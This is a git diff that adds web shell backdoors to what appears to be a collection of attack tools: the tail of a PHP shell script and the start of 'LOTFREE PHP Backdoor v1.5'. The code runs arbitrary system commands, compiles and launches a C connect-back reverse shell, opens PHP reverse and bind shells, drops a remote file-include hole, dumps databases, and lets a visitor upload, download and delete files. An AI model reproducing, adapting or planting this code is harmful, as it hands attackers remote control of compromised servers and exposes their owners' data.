+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
+		"</td></tr><tr><td>" .
+		display_tables($dbH, $dbu, $dbp, $dbn);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($Odbh)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$Odbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
+		"</td></tr><tr><td>" .
+		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($OdbH)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
+	if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
+		"</td></tr><tr><td> " .
+		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($OdbH, $dbu, $dbp);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+
+$strOutput .= "</font></td></tr></table>";
+$strOutputB64 = chunk_split(base64_encode($strOutput));
+echo "</div></div></div></div></div></div></div></div></div></div>\n";
+echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';
+
+######################################################################
+#
+# functions
+#
+######################################################################
+# make globals avail
+function import_globals()  
+{
+	global $HTTP_SERVER_VARS;
+	global $REMOTE_ADDR;  
+	global $PHP_SELF;
+	global $REQUESTS;
+	global $SCRIPT_FILENAME;
+	global $QUERY_STRING;
+	global $SCRIPT_URI;
+	global $SERVER_NAME;
+	$_igr = ini_get('register_globals');
+	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
+	if (phpversion() <= '4.1.0') {
+		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
+	} else {
+		$REQUESTS = $_REQUEST;
+	}
+	if($_SERVER['PHP_SELF']=="") {
+		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
+		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
+		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
+		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
+		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
+	} else {
+		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
+		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
+		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
+		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
+		$PHP_SELF        = $_SERVER['PHP_SELF'];
+		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
+	}
+}
+
+function dd($v) {
+	global $DebugArr;
+	$rv = "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if(array_search($key, $DebugArr)) {'.
+	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+function ddb($v) {
+	echo "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+######################################################################
+# cmd shell functions
+######################################################################
+# test what cmd is working
+function test_cmd_shell(){
+	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
+	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
+	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
+	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
+	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
+	else $var = 0;
+	return $var;
+}
+# function for executing cmds
+function Mexec($Mcmd, $type) {
+	if($Mcmd != ""){
+		$dspec = array(
+			0 => array("pipe", "r"),
+			1 => array("pipe", "w"),
+			2 => array("pipe", "r")
+		);
+		$output = "";
+		switch($type) {
+			case 5:
+				$output .= "<pre>";
+				$lastline = exec($Mcmd, $arrOutput);
+				foreach($arrOutput as $val) {
+					$output .= $val . "\n";
+				}
+				$output .= "</pre>";
+				break;
+			case 4:
+				$proc = proc_open($Mcmd, $dspec, $pipes);
+				if (is_resource($proc)) {
+					$output .= "<pre>";
+					fclose($pipes[0]);
+					while(!feof($pipes[1])) {
+						$tmp = fgets($pipes[1], 1024);
+						$output .= $tmp;
+					}
+					$output .= "</pre>";
+				}
+				break;
+			case 3;
+				$output .= "<pre>";
+				$output .= `$Mcmd`;
+				$output .= "</pre>";
+				break;
+			case 2;
+				print "<pre>\n";
+				$output = system($Mcmd);
+				print "</pre>\n";
+				break;
+			case 1;
+				print "<pre>\n";
+				$output = passthru($Mcmd);
+				print "</pre>\n";
+				break;
+			case 0;
+			default;
+				$output = "There are no execute functions available!";
+				break;
+		}
+		return $output;
+	}	
+}
+function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
+	$msgerror = "";
+	if($msg == "") $msgerror = "please enter a message";
+	elseif($subject == "") $msgerror = "please enter a subject";
+	else {
+		$stlf = md5(uniqid(time())); 
+		$attach = "";
+		$fp = fopen($attach_source, "rb"); 
+		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
+		$header = "From: $from\n"; 
+		$header .= "MIME-Version: 1.0\n"; 
+		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
+		$header .= "This is a multi-part message in MIME format\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: text/plain\n"; 
+		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
+		$header .= "$msg\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
+		$header .= "Content-Transfer-Encoding: base64\n"; 
+		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
+		$header .= chunk_split(base64_encode($attach)); 
+		$header .= "\n"; 
+		$header .= "--$stlf--"; 
+		mail($to,$subject,"",$header); 
+		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
+	} 
+	return $msgerror;
+}
+
+######################################################################
+# system browsing
+######################################################################
+
+function make_switch($val){
+	global $txt;
+	global $lang;
+	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
+	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
+	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
+	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
+}
+function drop_syslog_warning($msg) {
+	global $syslog;
+#	if($syslog == 1) syslog(LOG_WARNING,$msg);
+}
+
+######################################################################
+# file functions
+######################################################################
+function copy_file($source,$dest) {
+	$dataout = "";
+	if($source == "")  $dataout .= "enter source<br>\n";
+	if($dest != "") {
+		ini_set("user_agent","m0ins downloader");
+		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
+		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "enter destination";
+	}
+}
+function edit_file($cont,$dest,$do) {
+	$dataout = "";
+	global $magic_quotes_gpc;
+	if(file_exists($dest)) {
+		if($do == 1){
+			$fh = fopen($dest, "w");		
+			if(!$fh) {
+				$dataout .= "unable to open <b>$dest</b>.\n";
+			} else {
+#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
+				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
+				$write = fwrite($fh, $cont);
+				fclose($fh);
+			}
+		}
+		$dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "unable to open <b>$dest</b>.\n";
+	}
+	return $dataout;
+}
+function show_file($source) {
+	$dataout = "";
+	if(file_exists($source)) {
+		$fh = fopen($source, "r");
+		if(!$fh) {
+			$dataout .= "unable to open <b>$source</b>.\n";
+		} else {
+			$read = fread($fh, filesize($source));
+			fclose($fh);
+			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
+			$dataout .= $read;
+		}
+	} else {
+		$dataout .= "unable to open <b>$source</b>.\n";
+	}
+	return $dataout;
+}
+function snoopy($chdir){
+	$tmpOut = "";
+	global $is_file,$is_dir,$is_w_dir,$is_w_file;
+	$fh = opendir("$chdir");
+	if($fh!="") {
+		while (false !== ($filename = readdir($fh)) ) {
+			$FN = $chdir."/".$filename;
+			if(@is_file($FN)) $is_file[] = $filename;
+			if(@is_dir($FN))  $is_dir[] = $filename;
+			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
+			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
+		}
+		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
+		$tmpOut .= echo_files($is_file,  "all files");
+		$tmpOut .= echo_files($is_dir,   "only dirs");
+		$tmpOut .= echo_files($is_w_dir, "writable dirs");
+		$tmpOut .= echo_files($is_w_file,"writable files");
+		$tmpOut .= "</tr></table>";
+	} else {
+		$tmpOut .= "Permission denied.";
+	}
+	closedir($fh);
+	return $tmpOut;
+}
+
+function echo_files($arr,$txt){
+	$tmpOutMF = "";
+	global $chdir,$MyLoc,$SREQ;
+	$tmpOutMF .= "<td valign=top>";
+	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
+	if(count($arr) > 0) {
+		foreach($arr as $key => $file) {
+			$FN = $chdir."/".$file;
+			$owner = fileowner($FN);
+			$perms = substr(sprintf("%o",fileperms($FN)),-3);
+			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
+			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
+			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+		}
+	}
+    $tmpOutMF .=  "</td>";
+    return $tmpOutMF;
+}
+function print_globals($v) {
+	global $a;
+	echo "<blockquote>\n";
+	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
+	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
+	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
+	" @print_globals( \$v.\"[\".\$key.\"]\" );".
+	"}}";
+	eval($q);
+	echo "</blockquote>\n";
+}
+######################################################################
+# connect back shell function
+######################################################################
+
+function connect_back($tmp_dir, $compiler, $host, $port) {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+    $fbname = $tmp_dir . "/cbs";
+	$fp = fopen($fbname . ".c", "w");
+	$write = fwrite($fp, $shell);
+	fclose($fp);
+	if(!empty($write)) {
+		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
+		$execM = test_cmd_shell();
+		if($execM > 0) {
+			$rtval = Mexec($command, $execM);
+			$command = $fbname . " " . $host . " " . $port;
+			$rtval .= Mexec($command, $execM);
+			return "<pre>" . $rtval . "</pre>";
+		} else {
+			return "<b>ERROR! No EXEC Avilable!</b>";
+		}
+		
+	} else {
+		return "<b>ERROR! Writing data!</b>";
+	}
+}
+
+######################################################################
+# drop mini inc hole
+######################################################################
+function dropminiinc($location) {
+	$Scode = "<?php\n".
+		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
+		"else \$vars = \$_REQUEST;\n".
+		"include(\$vars[inc]);\n".
+		"?>\n";
+	$fp = fopen($location, "w");
+	$write = fwrite($fp, $Scode);
+	if(!empty($write)) return "<b>$location</b> copied\n";
+	else return "<b>ERROR! Not copied!</b>";
+}
+
+######################################################################
+# db functions
+# unchanged from dans code
+######################################################################
+function prep_rows($myresult) {
+	$dataout = "<table>\n";
+	$num_fields = mysql_num_fields($myresult);
+	$dataout .= "<tr border=1>\n";
+	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
+	$dataout .= "</tr>\n";
+	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout .= "<td>$colvalue</td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	return $dataout;
+}
+
+function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	mysql_free_result($result);
+	mysql_close($link);
+	return "Hopefully dumped!";
+}
+
+function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = $mysql;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	mysql_select_db($mydb); //  or return "Could not select database";
+	$query = "SELECT * FROM ".$mytable;
+	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
+	$dataouted = prep_rows($result);
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataouted);
+}
+
+function display_tables($myhost, $myuser, $mypass, $mydb) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = mysql_list_tables($mydb);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function display_dbs($myhost, $myuser, $mypass) {
+	global $MyLoc,$SREQ;
+	$link = mysql_connect($myhost, $myuser, $mypass);
+	$result = mysql_list_dbs($link);
+	if (!$result) {
+		return "DB Error, could not list databases";
+	}
+	$dataout = "<table>\n";
+	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+		$dataout .= "<tr>\n";
+		foreach ($line as $col_value) {
+			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
+		}
+	$dataout .= "</tr>\n";
+	}
+	$dataout .= "</table>\n";
+	mysql_free_result($result);
+	mysql_close($link);
+	return($dataout);
+}
+
+function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$query = "SELECT * FROM ".$mytable;
+	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		$dataout = $dataout . "<tr>\n";
+		foreach($line as $colvalue) {
+			$dataout = $dataout . "<td>$colvalue</td>\n";
+		}
+	$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+function Odisplay_tables($myhost, $myuser, $mypass) {
+	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
+	$result = odbc_tables($link);
+	if (!$result) {
+		return "DB Error, could not list tables";
+	}
+	$dataout = "<table>\n";
+	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
+		if(odbc_result($line, 4) == "TABLE") {
+			$dataout = $dataout . "<tr>\n";
+			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
+		}
+		$dataout = $dataout . "</tr>\n";
+	}
+	$dataout = $dataout . "</table>\n";
+	return($dataout);
+}
+
+######################################################################
+# Dan's Network function Wrappers
+# Initial use inside this script, need to handle the error data 
+# differently to get it included in the base 64 output!
+######################################################################
+
+function DB_NET_GET_SOCKET_PROTOCOL($prot) {
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	return(array($protocol, $socktype));
+}
+
+function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
+	$address = gethostbyname($hostname);
+	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
+	switch($prot) {
+		case "udp":
+			$protocol = SOL_UDP;
+			$socktype = SOCK_DGRAM;
+		break;
+		case "tcp":
+		default:
+			$protocol = SOL_TCP;
+			$socktype = SOCK_STREAM;
+		break;
+	}
+	$socket = socket_create(AF_INET, $socktype, $protocol);
+	if ($socket < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
+	}
+
+	$result = socket_connect($socket, $address, $port);
+	if ($result < 0) {
+		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
+	}
+	return $socket;
+}
+
+function DB_NET_LISTEN($address, $port) {
+	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
+		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
+		return(-1);
+	}
+
+	if (($ret = socket_bind($sock, $address, $port)) < 0) {
+		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-2);
+	}
+
+	if (($ret = socket_listen($sock, 5)) < 0) {
+		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
+		return(-3);
+	}
+
+	return($sock);
+}
+
+######################################################################
+# Dan's PHP Connect Back / Port Binding Shell!
+# Yes that right a REAL shell!
+# Now I had this idea for ages, finally coded it 6 months ago, and 
+# it's never really been used.
+# Not really brain science but when there are many examples of PHP 
+# sockets + proc_open it's a little harder.
+######################################################################
+
+function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
+	if($type == "cb" && $host != "0.0.0.0") {
+		$procsock = DB_NET_CONNECT($host, $port, "tcp");
+	} elseif ($type == "pb") {
+		$lsock = DB_NET_LISTEN($host, $port);
+		if (($procsock = socket_accept($lsock)) < 0) {
+    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
+    	}
+	} else {
+		return "Error no connection details specified!";
+	}
+
+	set_time_limit(9000);
+	$descriptorspec = array(
+		0 => array("pipe", "r"),
+		1 => array("pipe", "w"),
+		2 => array("pipe", "w")
+	);
+	$process = proc_open($shell, $descriptorspec, $pipes);
+	if (is_resource($process)) {
+		$tmp_loop = 1;
+		do {
+			$tmp_array = array($procsock);
+			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
+			if ($num_changed_sockets === false) {
+				$tmp_loop = 0;
+			} else if ($num_changed_sockets > 0) {
+				foreach($tmp_array as $k => $v) {
+					if($v == $procsock) {
+						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
+						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
+						fwrite($pipes[0], $buf);
+					}
+				}
+			}
+			$tmp_arrayS = array($pipes[1], $pipes[2]);
+			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
+			if ($num_changed_streams === FALSE) {
+				$tmp_loop = 0;
+			} else if ($num_changed_streams > 0) {
+				foreach($tmp_arrayS as $k => $v) {
+					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
+					socket_write($procsock, $buf, strlen($buf));
+				}
+			}
+		} while($tmp_loop == 1);
+	} else {
+		return "Error executing shell " . $shell;
+	}
+}
+
+?>
diff --git a/xakep-shells/PHP/phpbackdoor15.php.txt b/xakep-shells/PHP/phpbackdoor15.php.txt
new file mode 100644
index 0000000..06f2321
--- /dev/null
+++ b/xakep-shells/PHP/phpbackdoor15.php.txt
@@ -0,0 +1,133 @@
+<?php
+function good_link($link)
+{
+  $link=ereg_replace("/+","/",$link);
+  $link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
+  $link=ereg_replace("/+","/",$link);
+  if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
+  if($link=="")$link=".";
+  return $link;
+}
+
+$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
+$dir=good_link($dir);
+$rep=opendir($dir);
+chdir($dir);
+
+if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
+{
+  header("Content-Type: application/octet-stream");
+  header("Content-Length: ".filesize($_REQUEST["down"]));
+  header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
+  readfile($_REQUEST["down"]);
+  exit();
+}
+?>
+<html>
+<head><title>LOTFREE PHP Backdoor v1.5</title></head>
+<body>
+<br>
+<?php
+  echo "Actuellement dans <b>".getcwd()."</b><br>\n";
+  echo "<b>dir = '$dir'</b><br>\n";
+  echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
+ 
+  if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
+  {
+    echo "<pre>\n";
+    system($_REQUEST['cmd']);
+    echo "</pre>\n";
+  }
+
+  if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
+  {
+    if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
+    {
+      if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
+      {
+        echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
+      }
+      else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
+    }
+    else echo "fichier trop gros!<br>\n";
+  }
+
+  if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
+  {
+    if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
+    else echo "Impossible de supprimer le fichier<br>\n";
+  }
+
+?>
+<hr>
+<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
+<?php
+  $t_dir=array();
+  $t_file=array();
+  $i_dir=0;
+  $i_file=0;
+  while($x=readdir($rep))
+  {
+    if(is_dir($x))$t_dir[$i_dir++]=$x;
+    else $t_file[$i_file++]=$x;
+  }
+  closedir($rep);
+  while(1)
+  {
+?>
+<tr>
+  <td width="20%" bgcolor="lightgray" valign="top">
+<?php
+    if($x=each($t_dir))
+    {
+      $name=$x["value"];
+      if($name=='.'){}
+      elseif($name=='..') echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
+      else echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
+    }
+?>
+  </td>
+  <td width='78%'<?php
+    if($y=each($t_file))
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
+      else echo ">\n";
+      echo "    <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
+    }
+    else echo ">\n";
+?>
+  </td>
+  <td valign='center' width='2%'<?php
+    if($y)
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'";
+      echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
+    }
+    else echo ">\n";
+?></td>
+</tr>
+<?php
+    if(!$x && !$y)break;
+  }
+?>
+</table>
+<hr>
+<br>
+<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
+<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
+</form><br>
+Uploader un fichier dans le repertoire courant :<br>
